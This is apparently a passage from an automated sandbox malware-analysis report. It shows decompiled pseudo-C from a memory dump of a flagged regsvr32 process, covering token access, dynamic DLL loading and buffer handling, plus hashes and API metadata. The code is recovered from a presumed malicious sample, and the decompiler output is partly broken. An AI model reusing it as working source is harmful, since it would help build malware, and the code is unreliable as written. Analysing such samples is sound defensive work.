                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t253 = _a8;
                                                                                                                                                                        						if(_t269 == 0) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                        							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                        								goto L7;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					break;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t142 =  *_t272;
                                                                                                                                                                        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                        				_a4 = _t232;
                                                                                                                                                                        				if(_t232 == 0) {
                                                                                                                                                                        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t254 =  *_t83;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        					_t224 =  *_t59;
                                                                                                                                                                        					if(_t232 < _t224) {
                                                                                                                                                                        						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t260 =  *_t66;
                                                                                                                                                                        						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                        						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                        							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t261 = _t260 - _t224;
                                                                                                                                                                        							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                        							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                        							_t70 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        							_t188 =  *_t70;
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t232 = _a4;
                                                                                                                                                                        							__eflags = _t188 - 2;
                                                                                                                                                                        							if(_t188 < 2) {
                                                                                                                                                                        								_t189 = _t188 + 1;
                                                                                                                                                                        								__eflags = _t189;
                                                                                                                                                                        								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t76 = _t272 + 0x6c;
                                                                                                                                                                        						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                        						__eflags =  *_t76;
                                                                                                                                                                        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t184 =  *_t78;
                                                                                                                                                                        						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t239 =  *_t79;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                        						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                        						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t184 =  *_t62;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t239 = _t184;
                                                                                                                                                                        						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t254 = _t184;
                                                                                                                                                                        					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                        					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                        					_t185 =  *_t81;
                                                                                                                                                                        					_t240 = _t239 - _t185;
                                                                                                                                                                        					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                        					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                        					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t269 == 0) {
                                                                                                                                                                        					_t218 = _a8;
                                                                                                                                                                        					__eflags = _t218;
                                                                                                                                                                        					if(_t218 == 0) {
                                                                                                                                                                        						L34:
                                                                                                                                                                        						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t219 =  *_t272;
                                                                                                                                                                        						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                        						_a4 =  *_t272;
                                                                                                                                                                        						_t234 = _t254;
                                                                                                                                                                        						_v16 = _t145;
                                                                                                                                                                        						_v8 = _t254;
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                        							_v8 = _t254;
                                                                                                                                                                        							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							_a4 = _t219;
                                                                                                                                                                        							_t234 = _t254;
                                                                                                                                                                        							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                        							if( *_t95 >=  *_t97) {
                                                                                                                                                                        								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t167 =  *_t98;
                                                                                                                                                                        								_t259 = _t254 - _t167;
                                                                                                                                                                        								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                        								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                        								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                        								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        								_t170 =  *_t103;
                                                                                                                                                                        								_t273 = _t273 + 0xc;
                                                                                                                                                                        								__eflags = _t170 - 2;
                                                                                                                                                                        								if(_t170 < 2) {
                                                                                                                                                                        									_t172 = _t170 + 1;
                                                                                                                                                                        									__eflags = _t172;
                                                                                                                                                                        									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t145 = _v16 +  *_t106;
                                                                                                                                                                        								__eflags = _t145;
                                                                                                                                                                        								_a4 =  *_t272;
                                                                                                                                                                        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        								_t234 =  *_t108;
                                                                                                                                                                        								_v8 = _t234;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t255 = _a4;
                                                                                                                                                                        						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                        						__eflags = _t145 - _t220;
                                                                                                                                                                        						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                        						_t146 = _t221;
                                                                                                                                                                        						_a4 = _t221;
                                                                                                                                                                        						_t222 = _a8;
                                                                                                                                                                        						__eflags = _t146;
                                                                                                                                                                        						if(_t146 != 0) {
                                                                                                                                                                        							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							E05BA5FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t117 = _t272 + 0x6c;
                                                                                                                                                                        							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                        							__eflags =  *_t117;
                                                                                                                                                                        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        							_t234 =  *_t119;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                        						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                        							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                        						__eflags = _t257 - 0xffff;
                                                                                                                                                                        						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                        						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t151 =  *_t124;
                                                                                                                                                                        						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        						_t235 = _t234 -  *_t125;
                                                                                                                                                                        						__eflags = _t258 - _t151;
                                                                                                                                                                        						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                        						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                        						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                        							L49:
                                                                                                                                                                        							__eflags = _t235 - _t258;
                                                                                                                                                                        							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                        							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                        							__eflags = _t222 - 4;
                                                                                                                                                                        							if(_t222 != 4) {
                                                                                                                                                                        								L53:
                                                                                                                                                                        								_t269 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t161 =  *_t272;
                                                                                                                                                                        								__eflags =  *(_t161 + 4);
                                                                                                                                                                        								_t154 = _a4;
                                                                                                                                                                        								if( *(_t161 + 4) != 0) {
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _t154 - _t235;
                                                                                                                                                                        									if(_t154 != _t235) {
                                                                                                                                                                        										goto L53;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t269 = _t222 - 3;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							E05BA7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                        							_t134 = _t272 + 0x5c;
                                                                                                                                                                        							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                        							__eflags =  *_t134;
                                                                                                                                                                        							E05BA5E80( *_t134,  *_t272);
                                                                                                                                                                        						} else {
                                                                                                                                                                        							__eflags = _t235;
                                                                                                                                                                        							if(_t235 != 0) {
                                                                                                                                                                        								L46:
                                                                                                                                                                        								__eflags = _t222;
                                                                                                                                                                        								if(_t222 != 0) {
                                                                                                                                                                        									_t162 =  *_t272;
                                                                                                                                                                        									__eflags =  *(_t162 + 4);
                                                                                                                                                                        									if( *(_t162 + 4) == 0) {
                                                                                                                                                                        										__eflags = _t235 - _t258;
                                                                                                                                                                        										if(_t235 <= _t258) {
                                                                                                                                                                        											goto L49;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								__eflags = _t222 - 4;
                                                                                                                                                                        								if(_t222 == 4) {
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("sbb edi, edi");
                                                                                                                                                                        						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                        						__eflags = _t271;
                                                                                                                                                                        						return _t271;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__eflags = _t218 - 4;
                                                                                                                                                                        						if(_t218 == 4) {
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t173 =  *_t272;
                                                                                                                                                                        							__eflags =  *(_t173 + 4);
                                                                                                                                                                        							if( *(_t173 + 4) != 0) {
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        								__eflags = _t254 -  *_t88;
                                                                                                                                                                        								if(_t254 !=  *_t88) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return 3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x05ba437f
                                                                                                                                                                        0x05ba4381
                                                                                                                                                                        0x05ba4381
                                                                                                                                                                        0x05ba4384
                                                                                                                                                                        0x05ba4386
                                                                                                                                                                        0x05ba4389
                                                                                                                                                                        0x05ba4391
                                                                                                                                                                        0x05ba4394
                                                                                                                                                                        0x05ba4399
                                                                                                                                                                        0x05ba4399
                                                                                                                                                                        0x05ba439f
                                                                                                                                                                        0x05ba43a2
                                                                                                                                                                        0x05ba43a5
                                                                                                                                                                        0x05ba43a7
                                                                                                                                                                        0x05ba43a7
                                                                                                                                                                        0x05ba43a8
                                                                                                                                                                        0x05ba43a8
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b3
                                                                                                                                                                        0x05ba43b6
                                                                                                                                                                        0x05ba43b9
                                                                                                                                                                        0x05ba43b9
                                                                                                                                                                        0x05ba43bc
                                                                                                                                                                        0x05ba43bc
                                                                                                                                                                        0x05ba437f
                                                                                                                                                                        0x05ba43bf
                                                                                                                                                                        0x05ba43c2
                                                                                                                                                                        0x05ba43c5
                                                                                                                                                                        0x05ba43c7
                                                                                                                                                                        0x05ba43ca
                                                                                                                                                                        0x05ba43cc
                                                                                                                                                                        0x05ba43cf
                                                                                                                                                                        0x05ba43d2
                                                                                                                                                                        0x05ba43d4
                                                                                                                                                                        0x05ba43d7
                                                                                                                                                                        0x05ba43df
                                                                                                                                                                        0x05ba43e7
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ea
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43ed
                                                                                                                                                                        0x05ba43f0
                                                                                                                                                                        0x05ba43f6
                                                                                                                                                                        0x05ba43f8
                                                                                                                                                                        0x05ba43f8
                                                                                                                                                                        0x05ba43fe
                                                                                                                                                                        0x05ba4404
                                                                                                                                                                        0x05ba440d
                                                                                                                                                                        0x05ba4414
                                                                                                                                                                        0x05ba4416
                                                                                                                                                                        0x05ba4419
                                                                                                                                                                        0x05ba4419
                                                                                                                                                                        0x05ba441c
                                                                                                                                                                        0x05ba441c
                                                                                                                                                                        0x05ba441f
                                                                                                                                                                        0x05ba4421
                                                                                                                                                                        0x05ba4424
                                                                                                                                                                        0x05ba4426
                                                                                                                                                                        0x05ba4441
                                                                                                                                                                        0x05ba4441
                                                                                                                                                                        0x05ba4445
                                                                                                                                                                        0x05ba4448
                                                                                                                                                                        0x05ba444b
                                                                                                                                                                        0x05ba444e
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4464
                                                                                                                                                                        0x05ba4450
                                                                                                                                                                        0x05ba4450
                                                                                                                                                                        0x05ba4452
                                                                                                                                                                        0x05ba4456
                                                                                                                                                                        0x05ba4459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba445b
                                                                                                                                                                        0x05ba445b
                                                                                                                                                                        0x05ba445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445f
                                                                                                                                                                        0x05ba445d
                                                                                                                                                                        0x05ba4459
                                                                                                                                                                        0x05ba4468
                                                                                                                                                                        0x05ba446b
                                                                                                                                                                        0x05ba4470
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447a
                                                                                                                                                                        0x05ba447d
                                                                                                                                                                        0x05ba4428
                                                                                                                                                                        0x05ba4428
                                                                                                                                                                        0x05ba442a
                                                                                                                                                                        0x05ba4431
                                                                                                                                                                        0x05ba4431
                                                                                                                                                                        0x05ba4433
                                                                                                                                                                        0x05ba4435
                                                                                                                                                                        0x05ba4437
                                                                                                                                                                        0x05ba443b
                                                                                                                                                                        0x05ba443d
                                                                                                                                                                        0x05ba443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba443f
                                                                                                                                                                        0x05ba443b
                                                                                                                                                                        0x05ba442c
                                                                                                                                                                        0x05ba442c
                                                                                                                                                                        0x05ba442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba442f
                                                                                                                                                                        0x05ba442a
                                                                                                                                                                        0x05ba4487
                                                                                                                                                                        0x05ba4489
                                                                                                                                                                        0x05ba4489
                                                                                                                                                                        0x05ba4494
                                                                                                                                                                        0x05ba4337
                                                                                                                                                                        0x05ba4337
                                                                                                                                                                        0x05ba433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba433c
                                                                                                                                                                        0x05ba433c
                                                                                                                                                                        0x05ba433e
                                                                                                                                                                        0x05ba4342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4344
                                                                                                                                                                        0x05ba4347
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05ba434b
                                                                                                                                                                        0x05ba4354
                                                                                                                                                                        0x05ba4354
                                                                                                                                                                        0x05ba4347
                                                                                                                                                                        0x05ba4342
                                                                                                                                                                        0x05ba433a
                                                                                                                                                                        0x05ba4326
                                                                                                                                                                        0x05ba432f
                                                                                                                                                                        0x05ba432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: ebd68d5ff4e8f36a82071ff9ffe6f0aa06a94833e798a303f9c47698d3eaa964
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: FED105726087009FCB24CF6DD8C496AB7E6FF88304B2489ADE88AC7741E771F9458B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9C79E(void* __ecx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        
                                                                                                                                                                        				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t10 = _v8;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(GetLastError() != 0x3f0) {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t10 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t13 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t10;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 05B9C7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,05B9C8E3,00000000,05B90000), ref: 05B9C7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: 9ed957ccfedeb4602749d165b756138ebb59fad51879ab7c5bebefd514dec191
                                                                                                                                                                        • Instruction ID: 0e3e9d7057a9a32b72879dfabd7a46fe2a7502f71929739b2b33f0808829af8f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ed957ccfedeb4602749d165b756138ebb59fad51879ab7c5bebefd514dec191
                                                                                                                                                                        • Instruction Fuzzy Hash: CBF03A7A610205EBDF109BA4D84AFBA7FECFB08240F0004A0F602D7050EB64FA408BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E05B9D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v140;
                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                        				char _t15;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				WCHAR* _t34;
                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				char _t62;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				char _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __esi;
                                                                                                                                                                        				_t61 = __edi;
                                                                                                                                                                        				_t47 = __ebx;
                                                                                                                                                                        				_t50 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                        				_t14 =  *_t1;
                                                                                                                                                                        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                        					_t15 = E05B99DF2(_t50, 0x392);
                                                                                                                                                                        					_t66 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t62 = _t15;
                                                                                                                                                                        					_t67 = _t66 + 0xb0;
                                                                                                                                                                        					_v8 = _t62;
                                                                                                                                                                        					E05B99E51( &_v140, 0x40, L"%08x", E05B9E2C5(_t66 + 0xb0, E05B9A43D(_t66 + 0xb0), 0));
                                                                                                                                                                        					_t20 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                        					_t25 = E05B99DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                        					_t26 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t68 = E05B99A5A(_t26 + 0x1020);
                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                        					E05B98BAF( &_v8);
                                                                                                                                                                        					_t32 =  *0x5baf81c; // 0x5d5fbe8
                                                                                                                                                                        					_t34 = E05B99A5A(_t32 + 0x122a);
                                                                                                                                                                        					 *0x5baf91c = _t34;
                                                                                                                                                                        					_t35 =  *0x5baf818; // 0x5d5f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x5bac9a0,  &_v140, ".", L"dll", 0, 0x5bac9a0, _t25, 0x5bac9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                        					_t37 = LoadLibraryW( *0x5baf91c);
                                                                                                                                                                        					 *0x5baf914 = _t37;
                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_push(_t37);
                                                                                                                                                                        						_t60 = 0x28;
                                                                                                                                                                        						_t38 = E05B9F011(0x5bacb8c, _t60);
                                                                                                                                                                        					}
                                                                                                                                                                        					 *0x5baf918 = _t38;
                                                                                                                                                                        					E05B98BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					E05B98D6D( &_v140, 0, 0x80);
                                                                                                                                                                        					if( *0x5baf918 != 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E05B98BF4(0x5baf91c, 0xfffffffe);
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					if( *0x5baf918 == 0) {
                                                                                                                                                                        						_t46 =  *0x5baf850; // 0x5d5f9f0
                                                                                                                                                                        						 *0x5baf918 = _t46;
                                                                                                                                                                        					}
                                                                                                                                                                        					L10:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

























                                                                                                                                                                        0x05b9d37a
                                                                                                                                                                        0x05b9d37c
                                                                                                                                                                        0x05b9d381
                                                                                                                                                                        0x05b9d381
                                                                                                                                                                        0x05b9d386
                                                                                                                                                                        0x05b9d38a
                                                                                                                                                                        0x05b9d38a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 334497af9761c5364c7109a5ce7639a545bc364b9d91bd7ef9be0c0045544ca0
                                                                                                                                                                        • Instruction ID: 6cf9af1a3b1e6c931370eb52381fd26663719d254de1f2de0095e806c9a3a066
                                                                                                                                                                        • Opcode Fuzzy Hash: 334497af9761c5364c7109a5ce7639a545bc364b9d91bd7ef9be0c0045544ca0
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C317FB6654104AFDB54AA68EC4BFFA7AACEB45310F5481B6F004D3180EE34BA858769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05BA3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                        				char _v5;
                                                                                                                                                                        				long long _v12;
                                                                                                                                                                        				short _v20;
                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                        				char _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				char** _t32;
                                                                                                                                                                        				long long _t40;
                                                                                                                                                                        				long long _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t40 = __fp0;
                                                                                                                                                                        				_t15 = E05BA358D(_a4);
                                                                                                                                                                        				 *_t32 = "msxml3.dll";
                                                                                                                                                                        				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                        				_t16 = E05B9A43D();
                                                                                                                                                                        				_t26 = 0xf;
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                        				if(_t16 > _t26) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                        					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                        					_t25 = _t25 + 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t26 = _t16;
                                                                                                                                                                        					if(_t26 != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							goto L2;
                                                                                                                                                                        						} while (_t25 < _t26);
                                                                                                                                                                        					}
